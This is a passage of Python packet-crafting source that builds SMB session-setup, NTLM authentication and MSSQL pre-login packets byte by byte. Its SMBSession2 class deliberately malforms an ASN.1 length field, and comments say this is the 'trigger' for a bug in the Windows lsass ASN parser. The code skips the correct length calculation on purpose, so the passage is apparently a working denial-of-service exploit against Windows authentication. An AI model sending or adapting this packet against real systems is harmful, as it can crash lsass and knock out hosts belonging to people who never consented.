self.fields["Len"] = struct.pack(">h", len(CalculateCompletePacket)) self.fields["SSPIBuffLen"] = struct.pack("<i", len(CalculateSSPI))[:2] # Target Name Offsets self.fields["TargetNameOffset"] = struct.pack("<i", len(CalculateNameOffset)) self.fields["TargetNameLen"] = struct.pack( "<i", len(self.fields["TargetNameStr"]))[:2] self.fields["TargetNameMaxLen"] = struct.pack( "<i", len(self.fields["TargetNameStr"]))[:2] #AvPairs Offsets self.fields["TargetInfoOffset"] = struct.pack( "<i", len(CalculateAvPairsOffset)) self.fields["TargetInfoLen"] = struct.pack( "<i", len(CalculateAvPairsLen))[:2] self.fields["TargetInfoMaxLen"] = struct.pack( "<i", len(CalculateAvPairsLen))[:2] #AvPairs StrLen self.fields["Av1Len"] = struct.pack("<i", len(str( self.fields["Av1Str"])))[:2] self.fields["Av2Len"] = struct.pack("<i", len(str( self.fields["Av2Str"])))[:2] self.fields["Av3Len"] = struct.pack("<i", len(str( self.fields["Av3Str"])))[:2] self.fields["Av4Len"] = struct.pack("<i", len(str( self.fields["Av4Str"])))[:2] self.fields["Av5Len"] = struct.pack("<i", len(str( self.fields["Av5Str"])))[:2]
class SMBSession2(Packet): fields = OrderedDict([ ("wordcount", "\x0c"), ("AndXCommand", "\xff"), ("reserved", "\x00"), ("andxoffset", "\xfa\x00"), ("maxbuff", "\x04\x11"), ("maxmpx", "\x32\x00"), ("vcnum", "\x01\x00"), ("sessionkey", "\x00\x00\x00\x00"), ("securitybloblength", "\x59\x00"), ("reserved2", "\x00\x00\x00\x00"), ("capabilities", "\xd4\x00\x00\xa0"), ("bcc1", "\xbf\x00"), ("ApplicationHeaderTag", "\xa1"), ( "ApplicationHeaderTagLenOfLen", "\x84" ), #//BUG --> Trigger is this specific ASN "\x84" (unsigned int) definition. Since len of sec blob is <255 the correct value should be \x81. ( "ApplicationHeaderLen", "\xf6" ), #//BUG --> should be \xd1, lsass ASN parser is reading \xf6 + the next 3 chars (\x30\x81\xce) as len. ("AsnSecMechType", "\x30"), ("AsnSecMechLenOfLen", "\x81"), ("AsnSecMechLen", "\xce"), ("ChoosedTag", "\xa2"), ("ChoosedTagLenOfLen", "\x81"), # ("ChoosedTagLen", "\xcb"), ("ChoosedTag1", "\x04"), ("ChoosedTag1StrLenOfLen", "\x81"), ("ChoosedTag1StrLen", "\xc8"), # #### NTLM Offset starts here... #### ("NLMPAuthMsgSignature", "\x4E\x54\x4c\x4d\x53\x53\x50\x00"), ("NLMPAuthMsgMessageType", "\x03\x00\x00\x00"), ("NLMPAuthMsgLMChallengeLen", "\x18\x00"), ("NLMPAuthMsgLMChallengeMaxLen", "\x18\x00"), ("NLMPAuthMsgLMChallengeBuffOffset", "\x88\x00\x00\x00"), ("NLMPAuthMsgNtChallengeResponseLen", "\x08\x00"), ("NLMPAuthMsgNtChallengeResponseMaxLen", "\x08\x00"), ("NLMPAuthMsgNtChallengeResponseBuffOffset", "\xa0\x00\x00\x00"), ("NLMPAuthMsgNtDomainNameLen", "\x08\x00"), ("NLMPAuthMsgNtDomainNameMaxLen", "\x08\x00"), ("NLMPAuthMsgNtDomainNameBuffOffset", "\x48\x00\x00\x00"), ("NLMPAuthMsgNtUserNameLen", "\x1a\x00"), ("NLMPAuthMsgNtUserNameMaxLen", "\x1a\x00"), ("NLMPAuthMsgNtUserNameBuffOffset", "\x50\x00\x00\x00"), ("NLMPAuthMsgNtWorkstationLen", "\x1e\x00"), ("NLMPAuthMsgNtWorkstationMaxLen", "\x1e\x00"), ("NLMPAuthMsgNtWorkstationBuffOffset", "\x6a\x00\x00\x00"), ("NLMPAuthMsgRandomSessionKeyMessageLen", "\x00\x00"), ("NLMPAuthMsgRandomSessionKeyMessageMaxLen", "\x00\x00"), ("NLMPAuthMsgRandomSessionKeyMessageBuffOffset", "\x69\x00\x00\x00"), ("NLMPAuthMsgNtNegotiateFlags", "\x05\x8A\x88\xa2"), ("NegTokenInitSeqMechMessageVersionHigh", "\x05"), ("NegTokenInitSeqMechMessageVersionLow", "\x02"), ("NegTokenInitSeqMechMessageVersionBuilt", "\xce\x0e"), ("NegTokenInitSeqMechMessageVersionReserved", "\x00\x00\x00"), ("NegTokenInitSeqMechMessageVersionNTLMType", "\x0f"), ("NLMPAuthMsgNtDomainName", "SMB1"), ("NLMPAuthMsgNtUserName", "LGANDX"), ("NLMPAuthMsgNtWorkstationName", "LGANDX"), ("NLMPAuthLMChallengeStr", "\x06\xd7\x34\x6c\x40\x32\xe2\x97\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" ), ("NLMPAuthMsgNTLMV1ChallengeResponseStruct", "\xa8\x8c\xd8\x6c\x0e\x22\x08\x16\xb0\xf9\xc9\x64\x28\x74\x80\x05\x27\xc5\xc7\xf7\xc5\x88\xee\xdc" ), ("NLMPAuthMsgNSessionKey", "\xd8\xb3\x3a\x17\x94\xf7\x6d\xad\x5f\xd4\xc7\x91\xcb\x14\xbd\x4e"), ("NLMPAuthMsgNull", "\x00"), ("nativeOs", "Windows 2002 Service Pack 3 2600"), ("nativeOsterminator", "\x00\x00"), ("ExtraNull", "\x00\x00"), ("nativelan", "Windows 2002 5.1"), ("nativelanterminator", "\x00\x00\x00\x00"), ("AndxPadding", "\x00\x00"), ]) def calculate(self): ##Convert strings to Unicode before any Len calc. self.fields["NLMPAuthMsgNtUserName"] = self.fields[ "NLMPAuthMsgNtUserName"].encode('utf-16le') self.fields["NLMPAuthMsgNtDomainName"] = self.fields[ "NLMPAuthMsgNtDomainName"].encode('utf-16le') self.fields["NLMPAuthMsgNtWorkstationName"] = self.fields[ "NLMPAuthMsgNtWorkstationName"].encode('utf-16le') self.fields["nativeOs"] = self.fields["nativeOs"].encode('utf-16le') self.fields["nativelan"] = self.fields["nativelan"].encode('utf-16le') CompletePacketLen = str(self.fields["wordcount"]) + str( self.fields["AndXCommand"]) + str(self.fields["reserved"]) + str( self.fields["andxoffset"] ) + str(self.fields["maxbuff"]) + str(self.fields["maxmpx"]) + str( self.fields["vcnum"] ) + str(self.fields["sessionkey"]) + str(self.fields[ "securitybloblength"]) + str(self.fields["reserved2"]) + str( self.fields["capabilities"] ) + str( self.fields["bcc1"] ) + str( self.fields["ApplicationHeaderTag"] ) + str( self.fields["ApplicationHeaderTagLenOfLen"] ) + str( self.fields["ApplicationHeaderLen"] ) + str( self.fields["AsnSecMechType"] ) + str( self.fields["AsnSecMechLenOfLen"] ) + str( self.fields["AsnSecMechLen"] ) + str( self.fields["ChoosedTag"] ) + str( self.fields["ChoosedTagLenOfLen"] ) + str( self.fields["ChoosedTagLen"] ) + str( self.fields["ChoosedTag1"] ) + str( self.fields["ChoosedTag1StrLenOfLen"] ) + str( self.fields["ChoosedTag1StrLen"] ) + str( self.fields["NLMPAuthMsgSignature"] ) + str( self.fields["NLMPAuthMsgMessageType"] ) + str( self.fields["NLMPAuthMsgLMChallengeLen"] ) + str( self.fields["NLMPAuthMsgLMChallengeMaxLen"] ) + str( self.fields["NLMPAuthMsgLMChallengeBuffOffset"] ) + str( self.fields["NLMPAuthMsgNtChallengeResponseLen"] ) + str( self.fields["NLMPAuthMsgNtChallengeResponseMaxLen"] ) + str( self.fields["NLMPAuthMsgNtChallengeResponseBuffOffset"] ) + str( self.fields["NLMPAuthMsgNtDomainNameLen"] ) + str( self.fields["NLMPAuthMsgNtDomainNameMaxLen"] ) + str( self.fields["NLMPAuthMsgNtDomainNameBuffOffset"] ) + str( self.fields["NLMPAuthMsgNtUserNameLen"] ) + str( self.fields["NLMPAuthMsgNtUserNameMaxLen"] ) + str( self.fields["NLMPAuthMsgNtUserNameBuffOffset"] ) + str( self.fields["NLMPAuthMsgNtWorkstationLen"] ) + str( self.fields["NLMPAuthMsgNtWorkstationMaxLen"] ) + str( self.fields["NLMPAuthMsgNtWorkstationBuffOffset"] ) + str( self.fields["NLMPAuthMsgRandomSessionKeyMessageLen"] ) + str( self.fields["NLMPAuthMsgRandomSessionKeyMessageMaxLen"] ) + str( self.fields["NLMPAuthMsgRandomSessionKeyMessageBuffOffset"] ) + str(self.fields["NLMPAuthMsgNtNegotiateFlags"]) + str( self.fields["NegTokenInitSeqMechMessageVersionHigh"] ) + str( self.fields["NegTokenInitSeqMechMessageVersionLow"] ) + str( self.fields["NegTokenInitSeqMechMessageVersionBuilt"] ) + str( self.fields["NegTokenInitSeqMechMessageVersionReserved"] ) + str( self.fields["NegTokenInitSeqMechMessageVersionNTLMType"] ) + str(self.fields["NLMPAuthMsgNtDomainName"]) + str( self.fields["NLMPAuthMsgNtUserName"]) + str( self.fields["NLMPAuthMsgNtWorkstationName"] ) + str( self.fields["NLMPAuthLMChallengeStr"] ) + str( self.fields["NLMPAuthMsgNTLMV1ChallengeResponseStruct"] ) + str(self.fields["NLMPAuthMsgNSessionKey"]) + str( self.fields["NLMPAuthMsgNull"]) + str( self.fields["nativeOs"]) + str( self.fields["nativeOsterminator"]) + str( self.fields["ExtraNull"]) + str( self.fields["nativelan"]) + str( self.fields["nativelanterminator"]) SecurityBlobLen = str(self.fields["ApplicationHeaderTag"]) + str( self.fields["ApplicationHeaderTagLenOfLen"] ) + str(self.fields["ApplicationHeaderLen"]) + str( self.fields["AsnSecMechType"] ) + str(self.fields["AsnSecMechLenOfLen"]) + str( self.fields["AsnSecMechLen"] ) + str(self.fields["ChoosedTag"]) + str(self.fields[ "ChoosedTagLenOfLen"]) + str(self.fields["ChoosedTagLen"]) + str( self.fields["ChoosedTag1"] ) + str( self.fields["ChoosedTag1StrLenOfLen"] ) + str( self.fields["ChoosedTag1StrLen"] ) + str( self.fields["NLMPAuthMsgSignature"] ) + str( self.fields["NLMPAuthMsgMessageType"] ) + str( self.fields["NLMPAuthMsgLMChallengeLen"] ) + str( self.fields["NLMPAuthMsgLMChallengeMaxLen"] ) + str( self.fields["NLMPAuthMsgLMChallengeBuffOffset"] ) + str( self.fields["NLMPAuthMsgNtChallengeResponseLen"] ) + str( self.fields["NLMPAuthMsgNtChallengeResponseMaxLen"] ) + str( self.fields["NLMPAuthMsgNtChallengeResponseBuffOffset"] ) + str( self.fields["NLMPAuthMsgNtDomainNameLen"] ) + str( self.fields["NLMPAuthMsgNtDomainNameMaxLen"] ) + str( self.fields["NLMPAuthMsgNtDomainNameBuffOffset"] ) + str( self.fields["NLMPAuthMsgNtUserNameLen"] ) + str( self.fields["NLMPAuthMsgNtUserNameMaxLen"] ) + str( self.fields["NLMPAuthMsgNtUserNameBuffOffset"] ) + str( self.fields["NLMPAuthMsgNtWorkstationLen"] ) + str( self.fields["NLMPAuthMsgNtWorkstationMaxLen"] ) + str( self.fields["NLMPAuthMsgNtWorkstationBuffOffset"] ) + str( self.fields["NLMPAuthMsgRandomSessionKeyMessageLen"] ) + str( self.fields["NLMPAuthMsgRandomSessionKeyMessageMaxLen"] ) + str( self.fields["NLMPAuthMsgRandomSessionKeyMessageBuffOffset"] ) + str(self.fields["NLMPAuthMsgNtNegotiateFlags"]) + str( self.fields["NegTokenInitSeqMechMessageVersionHigh"]) + str( self.fields["NegTokenInitSeqMechMessageVersionLow"] ) + str( self.fields["NegTokenInitSeqMechMessageVersionBuilt"] ) + str( self.fields["NegTokenInitSeqMechMessageVersionReserved"] ) + str( self.fields["NegTokenInitSeqMechMessageVersionNTLMType"] ) + str(self.fields["NLMPAuthMsgNtDomainName"]) + str( self.fields["NLMPAuthMsgNtUserName"]) + str( self.fields["NLMPAuthMsgNtWorkstationName"]) + str( self.fields["NLMPAuthLMChallengeStr"] ) + str(self.fields[ "NLMPAuthMsgNTLMV1ChallengeResponseStruct"]) + str( self.fields["NLMPAuthMsgNSessionKey"]) CalculateOffsets = str(self.fields["NLMPAuthMsgSignature"]) + str( self.fields["NLMPAuthMsgMessageType"] ) + str(self.fields["NLMPAuthMsgLMChallengeLen"]) + str( self.fields["NLMPAuthMsgLMChallengeMaxLen"] ) + str(self.fields["NLMPAuthMsgLMChallengeBuffOffset"]) + str( self.fields["NLMPAuthMsgNtChallengeResponseLen"] ) + str(self.fields["NLMPAuthMsgNtChallengeResponseMaxLen"]) + str( self.fields["NLMPAuthMsgNtChallengeResponseBuffOffset"] ) + str(self.fields["NLMPAuthMsgNtDomainNameLen"]) + str( self.fields["NLMPAuthMsgNtDomainNameMaxLen"] ) + str(self.fields["NLMPAuthMsgNtDomainNameBuffOffset"]) + str( self.fields["NLMPAuthMsgNtUserNameLen"]) + str( self.fields["NLMPAuthMsgNtUserNameMaxLen"]) + str( self.fields["NLMPAuthMsgNtUserNameBuffOffset"] ) + str( self.fields["NLMPAuthMsgNtWorkstationLen"] ) + str( self.fields["NLMPAuthMsgNtWorkstationMaxLen"] ) + str( self.fields["NLMPAuthMsgNtWorkstationBuffOffset"] ) + str( self.fields["NLMPAuthMsgRandomSessionKeyMessageLen"] ) + str( self.fields["NLMPAuthMsgRandomSessionKeyMessageMaxLen"] ) + str( self.fields["NLMPAuthMsgRandomSessionKeyMessageBuffOffset"] ) + str(self.fields["NLMPAuthMsgNtNegotiateFlags"]) + str( self.fields["NegTokenInitSeqMechMessageVersionHigh"] ) + str( self.fields["NegTokenInitSeqMechMessageVersionLow"] ) + str( self.fields["NegTokenInitSeqMechMessageVersionBuilt"] ) + str( self.fields["NegTokenInitSeqMechMessageVersionReserved"] ) + str( self.fields["NegTokenInitSeqMechMessageVersionNTLMType"]) CalculateUserOffset = CalculateOffsets + str( self.fields["NLMPAuthMsgNtDomainName"]) CalculateDomainOffset = CalculateOffsets CalculateWorkstationOffset = CalculateUserOffset + str( self.fields["NLMPAuthMsgNtUserName"]) CalculateLMChallengeOffset = CalculateWorkstationOffset + str( self.fields["NLMPAuthMsgNtWorkstationName"]) CalculateNTChallengeOffset = CalculateLMChallengeOffset + str( self.fields["NLMPAuthLMChallengeStr"]) CalculateSessionOffset = CalculateNTChallengeOffset + str( self.fields["NLMPAuthMsgNTLMV1ChallengeResponseStruct"]) ## Packet len self.fields["andxoffset"] = struct.pack("<h", len(CompletePacketLen) + 32) ##Buff Len self.fields["securitybloblength"] = struct.pack( "<h", len(SecurityBlobLen)) ##Complete Buff Len self.fields["bcc1"] = struct.pack("<h", len(CompletePacketLen) - 27) ###### ASN Stuff if len(SecurityBlobLen) > 255: #self.fields["ApplicationHeaderTagLenOfLen"] = "\x82" --> //BUG not using this calc since it's our trigger. #self.fields["ApplicationHeaderLen"] = struct.pack(">H", len(SecurityBlobLen)-4) #-4 from secbloblen pass #Not calculating this one to trigger the bug. else: #self.fields["ApplicationHeaderTagLenOfLen"] = "\x81" --> //BUG not using this calc since it's our trigger. #self.fields["ApplicationHeaderLen"] = struct.pack(">B", len(SecurityBlobLen)-3) pass #Not calculating this one to trigger the bug. if len(SecurityBlobLen) - 8 > 255: self.fields["AsnSecMechLenOfLen"] = "\x82" self.fields["AsnSecMechLen"] = struct.pack(">H", len(SecurityBlobLen) - 8) #-8 from secbloblen else: self.fields["AsnSecMechLenOfLen"] = "\x81" self.fields["AsnSecMechLen"] = struct.pack( ">B", len(SecurityBlobLen) - 6) if len(SecurityBlobLen) - 12 > 255: self.fields["ChoosedTagLenOfLen"] = "\x82" self.fields["ChoosedTagLen"] = struct.pack( ">H", len(SecurityBlobLen) - 12) #-12 from secbloblen else: self.fields["ChoosedTagLenOfLen"] = "\x81" self.fields["ChoosedTagLen"] = struct.pack( ">B", len(SecurityBlobLen) - 9) if len(SecurityBlobLen) - 16 > 255: self.fields["ChoosedTag1StrLenOfLen"] = "\x82" self.fields["ChoosedTag1StrLen"] = struct.pack( ">H", len(SecurityBlobLen) - 16) #-16 from secbloblen else: self.fields["ChoosedTag1StrLenOfLen"] = "\x81" self.fields["ChoosedTag1StrLen"] = struct.pack( ">B", len(SecurityBlobLen) - 12) ##### Username Offset Calculation..###### self.fields["NLMPAuthMsgNtUserNameBuffOffset"] = struct.pack( "<i", len(CalculateUserOffset)) self.fields["NLMPAuthMsgNtUserNameLen"] = struct.pack( "<h", len(str(self.fields["NLMPAuthMsgNtUserName"]))) self.fields["NLMPAuthMsgNtUserNameMaxLen"] = struct.pack( "<h", len(str(self.fields["NLMPAuthMsgNtUserName"]))) ##### Domain Offset Calculation..###### self.fields["NLMPAuthMsgNtDomainNameBuffOffset"] = struct.pack( "<i", len(CalculateDomainOffset)) self.fields["NLMPAuthMsgNtDomainNameLen"] = struct.pack( "<h", len(str(self.fields["NLMPAuthMsgNtDomainName"]))) self.fields["NLMPAuthMsgNtDomainNameMaxLen"] = struct.pack( "<h", len(str(self.fields["NLMPAuthMsgNtDomainName"]))) ##### Workstation Offset Calculation..###### self.fields["NLMPAuthMsgNtWorkstationBuffOffset"] = struct.pack( "<i", len(CalculateWorkstationOffset)) self.fields["NLMPAuthMsgNtWorkstationLen"] = struct.pack( "<h", len(str(self.fields["NLMPAuthMsgNtWorkstationName"]))) self.fields["NLMPAuthMsgNtWorkstationMaxLen"] = struct.pack( "<h", len(str(self.fields["NLMPAuthMsgNtWorkstationName"]))) ##### NT Challenge Offset Calculation..###### self.fields["NLMPAuthMsgNtChallengeResponseBuffOffset"] = struct.pack( "<i", len(CalculateNTChallengeOffset)) self.fields["NLMPAuthMsgNtChallengeResponseLen"] = struct.pack( "<h", len(str(self.fields["NLMPAuthMsgNTLMV1ChallengeResponseStruct"]))) self.fields["NLMPAuthMsgNtChallengeResponseMaxLen"] = struct.pack( "<h", len(str(self.fields["NLMPAuthMsgNTLMV1ChallengeResponseStruct"]))) ##### LM Challenge Offset Calculation..###### self.fields["NLMPAuthMsgLMChallengeBuffOffset"] = struct.pack( "<i", len(CalculateLMChallengeOffset)) self.fields["NLMPAuthMsgLMChallengeLen"] = struct.pack( "<h", len(str(self.fields["NLMPAuthLMChallengeStr"]))) self.fields["NLMPAuthMsgLMChallengeMaxLen"] = struct.pack( "<h", len(str(self.fields["NLMPAuthLMChallengeStr"]))) ##### SessionKey Offset Calculation..###### self.fields[ "NLMPAuthMsgRandomSessionKeyMessageBuffOffset"] = struct.pack( "<i", len(CalculateSessionOffset)) self.fields["NLMPAuthMsgRandomSessionKeyMessageLen"] = struct.pack( "<h", len(str(self.fields["NLMPAuthMsgNSessionKey"]))) self.fields["NLMPAuthMsgRandomSessionKeyMessageMaxLen"] = struct.pack( "<h", len(str(self.fields["NLMPAuthMsgNSessionKey"])))
class MSSQLPreLoginAnswer(Packet): fields = OrderedDict([ ("PacketType", "\x04"), ("Status", "\x01"), ("Len", "\x00\x25"), ("SPID", "\x00\x00"), ("PacketID", "\x01"), ("Window", "\x00"), ("TokenType", "\x00"), ("VersionOffset", "\x00\x15"), ("VersionLen", "\x00\x06"), ("TokenType1", "\x01"), ("EncryptionOffset", "\x00\x1b"), ("EncryptionLen", "\x00\x01"), ("TokenType2", "\x02"), ("InstOptOffset", "\x00\x1c"), ("InstOptLen", "\x00\x01"), ("TokenTypeThrdID", "\x03"), ("ThrdIDOffset", "\x00\x1d"), ("ThrdIDLen", "\x00\x00"), ("ThrdIDTerminator", "\xff"), ("VersionStr", "\x09\x00\x0f\xc3"), ("SubBuild", "\x00\x00"), ("EncryptionStr", "\x02"), ("InstOptStr", "\x00"), ]) def calculate(self): CalculateCompletePacket = str(self.fields["PacketType"]) + str( self.fields["Status"] ) + str(self.fields["Len"]) + str(self.fields["SPID"]) + str( self.fields["PacketID"] ) + str(self.fields["Window"]) + str(self.fields["TokenType"]) + str( self.fields["VersionOffset"]) + str( self.fields["VersionLen"]) + str( self.fields["TokenType1"]) + str( self.fields["EncryptionOffset"]) + str( self.fields["EncryptionLen"]) + str( self.fields["TokenType2"]) + str( self.fields["InstOptOffset"]) + str( self.fields["InstOptLen"]) + str( self.fields["TokenTypeThrdID"] ) + str( self.fields["ThrdIDOffset"]) + str( self.fields["ThrdIDLen"] ) + str( self.fields["ThrdIDTerminator"] ) + str( self.fields["VersionStr"] ) + str( self.fields["SubBuild"] ) + str( self.fields["EncryptionStr"] ) + str(self.fields["InstOptStr"]) VersionOffset = str(self.fields["TokenType"]) + str( self.fields["VersionOffset"] ) + str(self.fields["VersionLen"]) + str( self.fields["TokenType1"] ) + str(self.fields["EncryptionOffset"]) + str( self.fields["EncryptionLen"]) + str( self.fields["TokenType2"]) + str( self.fields["InstOptOffset"]) + str( self.fields["InstOptLen"]) + str( self.fields["TokenTypeThrdID"]) + str( self.fields["ThrdIDOffset"]) + str( self.fields["ThrdIDLen"]) + str( self.fields["ThrdIDTerminator"]) EncryptionOffset = VersionOffset + str( self.fields["VersionStr"]) + str(self.fields["SubBuild"]) InstOpOffset = EncryptionOffset + str(self.fields["EncryptionStr"]) ThrdIDOffset = InstOpOffset + str(self.fields["InstOptStr"]) self.fields["Len"] = struct.pack(">h", len(CalculateCompletePacket)) #Version self.fields["VersionLen"] = struct.pack( ">h", len(self.fields["VersionStr"] + self.fields["SubBuild"])) self.fields["VersionOffset"] = struct.pack(">h", len(VersionOffset)) #Encryption self.fields["EncryptionLen"] = struct.pack( ">h", len(self.fields["EncryptionStr"])) self.fields["EncryptionOffset"] = struct.pack(">h", len(EncryptionOffset)) #InstOpt self.fields["InstOptLen"] = struct.pack(">h", len(self.fields["InstOptStr"])) self.fields["EncryptionOffset"] = struct.pack(">h", len(InstOpOffset)) #ThrdIDOffset self.fields["ThrdIDOffset"] = struct.pack(">h", len(ThrdIDOffset))
class SMBNegoData(Packet): fields = OrderedDict([ ("Data", ""), ("separator", "\x02"), ("dialect", "NT LM 0.12\x00"), ])
class SMBNego(Packet): fields = OrderedDict([("Wordcount", "\x00"), ("Bcc", "\x62\x00"), ("Data", "")]) def calculate(self): self.fields["Bcc"] = struct.pack("<h", len(str(self.fields["Data"])))
class SMBSessionData(Packet): fields = OrderedDict([ ("wordcount", "\x0c"), ("AndXCommand", "\xff"), ("reserved", "\x00"), ("andxoffset", "\xec\x00"), ("maxbuff", "\x04\x11"), ("maxmpx", "\x32\x00"), ("vcnum", "\x00\x00"), ("sessionkey", "\x00\x00\x00\x00"), ("securitybloblength", "\x4a\x00"), ("reserved2", "\x00\x00\x00\x00"), ("capabilities", "\xd4\x00\x00\xa0"), ("bcc1", "\xb1\x00"), #msg ntlm exchange nego. ("ApplicationHeaderTag", "\x60"), ("ApplicationHeaderLen", "\x48"), ("AsnSecMechType", "\x06"), ("AsnSecMechLen", "\x06"), ("AsnSecMechStr", "\x2b\x06\x01\x05\x05\x02"), ("ChoosedTag", "\xa0"), ("ChoosedTagStrLen", "\x3e"), ("NegTokenInitSeqHeadTag", "\x30"), ("NegTokenInitSeqHeadLen", "\x3c"), ("NegTokenInitSeqHeadTag1", "\xA0"), ("NegTokenInitSeqHeadLen1", "\x0e"), ("NegTokenInitSeqNLMPTag", "\x30"), ("NegTokenInitSeqNLMPLen", "\x0c"), ("NegTokenInitSeqNLMPTag1", "\x06"), ("NegTokenInitSeqNLMPTag1Len", "\x0a"), ("NegTokenInitSeqNLMPTag1Str", "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"), ("NegTokenInitSeqNLMPTag2", "\xa2"), ("NegTokenInitSeqNLMPTag2Len", "\x2a"), ("NegTokenInitSeqNLMPTag2Octet", "\x04"), ("NegTokenInitSeqNLMPTag2OctetLen", "\x28"), ("NegTokenInitSeqMechSignature", "\x4E\x54\x4c\x4d\x53\x53\x50\x00"), ("NegTokenInitSeqMechMessageType", "\x01\x00\x00\x00"), ("NegTokenInitSeqMechMessageFlags", "\x07\x82\x08\xa2"), ("NegTokenInitSeqMechMessageDomainNameLen", "\x00\x00"), ("NegTokenInitSeqMechMessageDomainNameMaxLen", "\x00\x00"), ("NegTokenInitSeqMechMessageDomainNameBuffOffset", "\x00\x00\x00\x00"), ("NegTokenInitSeqMechMessageWorkstationNameLen", "\x00\x00"), ("NegTokenInitSeqMechMessageWorkstationNameMaxLen", "\x00\x00"), ("NegTokenInitSeqMechMessageWorkstationNameBuffOffset", "\x00\x00\x00\x00"), ("NegTokenInitSeqMechMessageVersionHigh", "\x05"), ("NegTokenInitSeqMechMessageVersionLow", "\x01"), ("NegTokenInitSeqMechMessageVersionBuilt", "\x28\x0a"), ("NegTokenInitSeqMechMessageVersionReserved", "\x00\x00\x00"), ("NegTokenInitSeqMechMessageVersionNTLMType", "\x0f"), ("NegTokenInitSeqMechMessageVersionTerminator", "\x00"), ("nativeOs", "Windows 2002 Service Pack 3 2600"), ("nativeOsterminator", "\x00\x00"), ("nativelan", "Windows 2002 5.1"), ("nativelanterminator", "\x00\x00\x00\x00"), ]) def calculate(self): self.fields["nativeOs"] = self.fields["nativeOs"].encode('utf-16le') self.fields["nativelan"] = self.fields["nativelan"].encode('utf-16le') CompleteSMBPacketLen = str(self.fields["wordcount"]) + str( self.fields["AndXCommand"]) + str(self.fields["reserved"]) + str( self.fields["andxoffset"] ) + str(self.fields["maxbuff"]) + str(self.fields["maxmpx"]) + str( self.fields["vcnum"] ) + str(self.fields["sessionkey"]) + str(self.fields[ "securitybloblength"]) + str(self.fields["reserved2"]) + str( self.fields["capabilities"] ) + str( self.fields["bcc1"] ) + str( self.fields["ApplicationHeaderTag"] ) + str( self.fields["ApplicationHeaderLen"] ) + str( self.fields["AsnSecMechType"] ) + str( self.fields["AsnSecMechLen"] ) + str( self.fields["AsnSecMechStr"] ) + str( self.fields["ChoosedTag"] ) + str( self.fields["ChoosedTagStrLen"] ) + str( self.fields["NegTokenInitSeqHeadTag"] ) + str( self.fields["NegTokenInitSeqHeadLen"] ) + str( self.fields["NegTokenInitSeqHeadTag1"] ) + str( self.fields["NegTokenInitSeqHeadLen1"] ) + str( self.fields["NegTokenInitSeqNLMPTag"] ) + str( self.fields["NegTokenInitSeqNLMPLen"] ) + str( self.fields["NegTokenInitSeqNLMPTag1"] ) + str( self.fields["NegTokenInitSeqNLMPTag1Len"] ) + str( self.fields["NegTokenInitSeqNLMPTag1Str"] ) + str( self.fields["NegTokenInitSeqNLMPTag2"] ) + str( self.fields["NegTokenInitSeqNLMPTag2Len"] ) + str( self.fields["NegTokenInitSeqNLMPTag2Octet"] ) + str( self.fields["NegTokenInitSeqNLMPTag2OctetLen"] ) + str( self.fields["NegTokenInitSeqMechSignature"] ) + str( self.fields["NegTokenInitSeqMechMessageType"] ) + str( self.fields["NegTokenInitSeqMechMessageFlags"] ) + str( self.fields["NegTokenInitSeqMechMessageDomainNameLen"] ) + str( self.fields["NegTokenInitSeqMechMessageDomainNameMaxLen"] ) + str( self. fields["NegTokenInitSeqMechMessageDomainNameBuffOffset"] ) + str( self.fields["NegTokenInitSeqMechMessageWorkstationNameLen"] ) + str( self. fields["NegTokenInitSeqMechMessageWorkstationNameMaxLen"] ) + str( self.fields[ "NegTokenInitSeqMechMessageWorkstationNameBuffOffset"] ) + str( self.fields["NegTokenInitSeqMechMessageVersionHigh"] ) + str( self.fields["NegTokenInitSeqMechMessageVersionLow"] ) + str( self.fields["NegTokenInitSeqMechMessageVersionBuilt"] ) + str( self.fields["NegTokenInitSeqMechMessageVersionReserved"] ) + str( self.fields["NegTokenInitSeqMechMessageVersionNTLMType"] ) + str( self.fields["NegTokenInitSeqMechMessageVersionTerminator"] ) + str(self.fields["nativeOs"]) + str( self.fields["nativeOsterminator"]) + str( self.fields["nativelan"]) + str( self.fields["nativelanterminator"]) SecBlobLen = str(self.fields["ApplicationHeaderTag"]) + str( self.fields["ApplicationHeaderLen"] ) + str(self.fields["AsnSecMechType"]) + str( self.fields["AsnSecMechLen"] ) + str(self.fields["AsnSecMechStr"]) + str( self.fields["ChoosedTag"] ) + str(self.fields["ChoosedTagStrLen"]) + str( self.fields["NegTokenInitSeqHeadTag"] ) + str( self.fields["NegTokenInitSeqHeadLen"] ) + str( self.fields["NegTokenInitSeqHeadTag1"] ) + str( self.fields["NegTokenInitSeqHeadLen1"] ) + str( self.fields["NegTokenInitSeqNLMPTag"] ) + str( self.fields["NegTokenInitSeqNLMPLen"] ) + str( self.fields["NegTokenInitSeqNLMPTag1"] ) + str( self.fields["NegTokenInitSeqNLMPTag1Len"] ) + str( self.fields["NegTokenInitSeqNLMPTag1Str"] ) + str( self.fields["NegTokenInitSeqNLMPTag2"] ) + str( self.fields["NegTokenInitSeqNLMPTag2Len"] ) + str( self.fields["NegTokenInitSeqNLMPTag2Octet"] ) + str( self.fields["NegTokenInitSeqNLMPTag2OctetLen"] ) + str( self.fields["NegTokenInitSeqMechSignature"] ) + str( self.fields["NegTokenInitSeqMechMessageType"] ) + str( self.fields["NegTokenInitSeqMechMessageFlags"] ) + str( self.fields["NegTokenInitSeqMechMessageDomainNameLen"] ) + str( self.fields["NegTokenInitSeqMechMessageDomainNameMaxLen"] ) + str( self.fields["NegTokenInitSeqMechMessageDomainNameBuffOffset"] ) + str( self.fields["NegTokenInitSeqMechMessageWorkstationNameLen"] ) + str( self.fields["NegTokenInitSeqMechMessageWorkstationNameMaxLen"] ) + str( self.fields["NegTokenInitSeqMechMessageWorkstationNameBuffOffset"] ) + str(self.fields["NegTokenInitSeqMechMessageVersionHigh"]) + str( self.fields["NegTokenInitSeqMechMessageVersionLow"]) + str( self.fields["NegTokenInitSeqMechMessageVersionBuilt"]) + str( self.fields["NegTokenInitSeqMechMessageVersionReserved"] ) + str( self.fields["NegTokenInitSeqMechMessageVersionNTLMType"]) data3 = str(self.fields["NegTokenInitSeqHeadTag"]) + str( self.fields["NegTokenInitSeqHeadLen"] ) + str(self.fields["NegTokenInitSeqHeadTag1"]) + str( self.fields["NegTokenInitSeqHeadLen1"] ) + str(self.fields["NegTokenInitSeqNLMPTag"]) + str( self.fields["NegTokenInitSeqNLMPLen"] ) + str(self.fields["NegTokenInitSeqNLMPTag1"]) + str( self.fields["NegTokenInitSeqNLMPTag1Len"] ) + str(self.fields["NegTokenInitSeqNLMPTag1Str"]) + 